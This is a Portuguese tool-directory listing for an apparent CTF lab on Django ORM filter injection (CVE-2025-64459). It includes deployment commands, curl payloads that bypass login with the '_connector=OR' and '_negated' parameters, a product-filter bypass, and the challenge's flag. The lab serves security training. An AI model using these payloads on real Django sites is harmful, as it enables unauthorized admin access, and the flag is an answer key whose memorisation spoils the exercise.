Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/z3yr0xx/cve-2025-64459
Análise de VulnerabilidadesExploração de Aplicações WebSegurança WebCTFAprendizado e EducaçãoLabs e Prática
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

# Desafio CTF demonstrando injeção de filtro no Django ORM (CVE-2025-64459) com exploits de bypass de autenticação e bypass de filtro de produtos, incluindo implantação e recuperação de flag.

Ver Repositório
7há 9 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Desafio CTF: Django ORM Injection (CVE-2025-64459)

Categoria: Segurança Web
Dificuldade: Média
Vulnerabilidade: CVE-2025-64459 - Django ORM Filter Injection

📝 Descrição

Construímos uma loja de mercadorias segura com painel de administrador. Consegue contornar a autenticação e encontrar a nota privada do administrador?

URL: http://YOUR_SERVER:6008

🚀 Implantação

cd web_django_cve
docker-compose up --build -d

🎯 Exploits (CVE-2025-64459)

Bypass de Autenticação (/login/)

# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Bypass do Filtro de Produtos (/)

# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 Flag

lol-you-here_then-you_exploited_me

Baixar ferramenta